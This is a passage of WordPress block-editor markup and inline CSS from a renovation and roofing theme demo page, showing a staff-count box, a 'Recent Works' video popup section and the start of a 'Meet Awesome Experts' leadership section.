2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"42aff9bf-25ea-43ea-b807-8a8c00c85148\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-42aff9bf-25ea-43ea-b807-8a8c00c85148 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"67a82438-88af-4556-ac9e-4c3da247e0cf\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-67a82438-88af-4556-ac9e-4c3da247e0cf\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"72cbdd00-2b42-4deb-a7fd-0c19210e65bf\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ce6cb053-1ec8-4c04-85db-13a427505324\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-ce6cb053-1ec8-4c04-85db-13a427505324 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"9f4663ea-a5db-40fc-b1cc-f21b84eb8759\"} -->\n<style type=\"text/css\"> .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"91d4b807-310e-4d33-9c09-5410cb4f7c01\"} -->\n<style type=\"text/css\"> .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-91d4b807-310e-4d33-9c09-5410cb4f7c01\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"7b681c73-1c40-4bb3-af82-2e7717982562\"} -->\n<style type=\"text/css\"> .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7b681c73-1c40-4bb3-af82-2e7717982562\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div 